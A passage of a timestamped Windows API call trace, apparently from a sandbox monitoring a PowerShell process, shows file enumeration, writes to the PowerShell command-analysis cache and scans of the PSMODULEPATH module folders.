	[0049.098] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.098] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.099] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.099] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.099] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.099] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.099] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.099] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.099] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.100] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.100] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.100] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.100] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.100] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.100] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.100] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.100] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.100] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.100] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.100] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.101] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.101] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.101] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.101] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.101] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.101] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.101] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.101] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.102] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.102] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.102] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.102] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.102] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.102] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.102] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.102] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.102] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.102] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.102] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.103] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.103] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.103] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.103] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.103] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.103] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.103] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.103] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.103] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.103] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.104] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.104] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.104] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 1
	[0049.104] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18db70 | out: lpFindFileData=0x184c18db70) returned 0
	[0049.104] FindClose (in: hFindFile=0x1505fab7b00 | out: hFindFile=0x1505fab7b00) returned 1
	[0049.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18ddd0) returned 1
	[0049.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd80) returned 1
	[0049.106] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbbf940
	[0049.106] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbbf940 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0049.106] CoTaskMemFree (pv=0x1505fbbf940) 
	[0049.106] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18d690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0049.106] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18d830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0049.106] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dc70) returned 1
	[0049.106] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x184c18dd50 | out: lpFileInformation=0x184c18dd50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95cbb7af, ftCreationTime.dwHighDateTime=0x1d31d93, ftLastAccessTime.dwLowDateTime=0xc171bbc1, ftLastAccessTime.dwHighDateTime=0x1d31d93, ftLastWriteTime.dwLowDateTime=0xc171bbc1, ftLastWriteTime.dwHighDateTime=0x1d31d93, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1
	[0049.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc30) returned 1
	[0049.106] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x184c18d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6a
	[0049.106] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dbb0) returned 1
	[0049.106] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5c0
	[0049.106] GetFileType (hFile=0x5c0) returned 0x1
	[0049.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18db20) returned 1
	[0049.107] GetFileType (hFile=0x5c0) returned 0x1
	[0049.107] SetEndOfFile (hFile=0x5c0) returned 1
	[0049.372] WriteFile (in: hFile=0x5c0, lpBuffer=0x150473a5e18*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x184c18d588, lpOverlapped=0x0 | out: lpBuffer=0x150473a5e18*, lpNumberOfBytesWritten=0x184c18d588*=0x1000, lpOverlapped=0x0) returned 1
	[0049.374] WriteFile (in: hFile=0x5c0, lpBuffer=0x150473a5e18*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x184c18d3c8, lpOverlapped=0x0 | out: lpBuffer=0x150473a5e18*, lpNumberOfBytesWritten=0x184c18d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0049.374] WriteFile (in: hFile=0x5c0, lpBuffer=0x150473a5e18*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x184c18d588, lpOverlapped=0x0 | out: lpBuffer=0x150473a5e18*, lpNumberOfBytesWritten=0x184c18d588*=0x1000, lpOverlapped=0x0) returned 1
	[0049.374] WriteFile (in: hFile=0x5c0, lpBuffer=0x150473a5e18*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x184c18d3c8, lpOverlapped=0x0 | out: lpBuffer=0x150473a5e18*, lpNumberOfBytesWritten=0x184c18d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0049.375] WriteFile (in: hFile=0x5c0, lpBuffer=0x150473a5e18*, nNumberOfBytesToWrite=0xdda, lpNumberOfBytesWritten=0x184c18dcc8, lpOverlapped=0x0 | out: lpBuffer=0x150473a5e18*, lpNumberOfBytesWritten=0x184c18dcc8*=0xdda, lpOverlapped=0x0) returned 1
	[0049.378] CloseHandle (hObject=0x5c0) returned 1
	[0049.380] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18dad0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0049.380] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df50) returned 1
	[0049.380] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x150473a85c0 | out: lpFileInformation=0x150473a85c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1
	[0049.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df10) returned 1
	[0049.381] ReleaseMutex (hMutex=0x67c) returned 1
	[0049.383] CoCreateGuid (in: pguid=0x184c18df78 | out: pguid=0x184c18df78*(Data1=0xbc8efd80, Data2=0xe22e, Data3=0x42c1, Data4=([0]=0x9b, [1]=0xfc, [2]=0x13, [3]=0x5d, [4]=0x64, [5]=0x74, [6]=0xec, [7]=0x48))) returned 0x0
	[0049.388] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5c0
	[0049.388] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x690
	[0049.388] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6a0
	[0049.388] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x694
	[0049.388] SetEvent (hEvent=0x694) returned 1
	[0049.388] SetEvent (hEvent=0x5c0) returned 1
	[0049.388] SetEvent (hEvent=0x690) returned 1
	[0049.388] SetEvent (hEvent=0x6a0) returned 1
	[0049.389] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6ac
	[0049.389] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0049.438] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x184c18dad8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18dad8*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x17, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0049.438] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18d9e0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18d9e0*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x7, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0049.438] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x184c18dab8*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x17, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1)) | out: ActivityId=0x184c18dab8*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x17, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0049.846] CoTaskMemAlloc (cb=0x218) returned 0x1505fbbf2e0
	[0049.846] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1505fbbf2e0, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x93
	[0049.846] CoTaskMemFree (pv=0x1505fbbf2e0) 
	[0049.846] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18d130, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x35
	[0049.846] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d570) returned 1
	[0049.846] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18d650 | out: lpFileInformation=0x184c18d650*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0049.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d530) returned 1
	[0049.847] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\modules")) returned 0xffffffff
	[0049.852] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18d130, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a
	[0049.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d570) returned 1
	[0049.852] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18d650 | out: lpFileInformation=0x184c18d650*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0049.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d530) returned 1
	[0049.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x184c18d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32
	[0049.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d570) returned 1
	[0049.852] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18d650 | out: lpFileInformation=0x184c18d650*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1
	[0049.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d530) returned 1
	[0049.853] CoTaskMemAlloc (cb=0x218) returned 0x1505fbc0e80
	[0049.853] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1505fbc0e80, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x93
	[0049.853] CoTaskMemFree (pv=0x1505fbc0e80) 
	[0049.853] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18d130, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x35
	[0049.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d570) returned 1
	[0049.853] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18d650 | out: lpFileInformation=0x184c18d650*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0049.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d530) returned 1
	[0049.854] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\modules")) returned 0xffffffff
	[0049.856] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18d130, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a
	[0049.856] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d570) returned 1
	[0049.856] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18d650 | out: lpFileInformation=0x184c18d650*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0049.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d530) returned 1
	[0049.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x184c18d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32
	[0049.857] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d570) returned 1
	[0049.857] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18d650 | out: lpFileInformation=0x184c18d650*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1
	[0049.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d530) returned 1
	[0049.857] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d460) returned 1
	[0049.857] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a
	[0049.857] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\", nBufferLength=0x105, lpBuffer=0x184c18cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\", lpFilePart=0x0) returned 0x2b
	[0049.857] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*", lpFindFileData=0x184c18d100 | out: lpFindFileData=0x184c18d100) returned 0x1505fab7740
	[0049.858] FindNextFileW (in: hFindFile=0x1505fab7740, lpFindFileData=0x184c18d150 | out: lpFindFileData=0x184c18d150) returned 1
	[0049.858] FindNextFileW (in: hFindFile=0x1505fab7740, lpFindFileData=0x184c18d150 | out: lpFindFileData=0x184c18d150) returned 1
	[0049.858] FindNextFileW (in: hFindFile=0x1505fab7740, lpFindFileData=0x184c18d150 | out: lpFindFileData=0x184c18d150) returned 1
	[0049.858] FindNextFileW (in: hFindFile=0x1505fab7740, lpFindFileData=0x184c18d150 | out: lpFindFileData=0x184c18d150) returned 1
	[0049.858] FindNextFileW (in: hFindFile=0x1505fab7740, lpFindFileData=0x184c18d150 | out: lpFindFileData=0x184c18d150) returned 1
	[0049.858] FindNextFileW (in: hFindFile=0x1505fab7740, lpFindFileData=0x184c18d150 | out: lpFindFileData=0x184c18d150) returned 0
	[0049.858] FindClose (in: hFindFile=0x1505fab7740 | out: hFindFile=0x1505fab7740) returned 1
	[0049.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d3b0) returned 1
	[0049.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d370) returned 1
	[0049.858] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d460) returned 1
	[0049.858] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a
	[0049.858] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\", nBufferLength=0x105, lpBuffer=0x184c18cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\", lpFilePart=0x0) returned 0x2b
	[0049.858] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*", lpFindFileData=0x184c18d100 | out: lpFindFileData=0x184c18d100) returned 0x1505fab7bc0
	[0049.859] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d150 | out: lpFindFileData=0x184c18d150) returned 1
	[0049.859] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d150 | out: lpFindFileData=0x184c18d150) returned 1
	[0049.859] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d150 | out: lpFindFileData=0x184c18d150) returned 1
	[0049.859] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d150 | out: lpFindFileData=0x184c18d150) returned 1
	[0049.859] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d150 | out: lpFindFileData=0x184c18d150) returned 1
	[0049.859] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d150 | out: lpFindFileData=0x184c18d150) returned 0
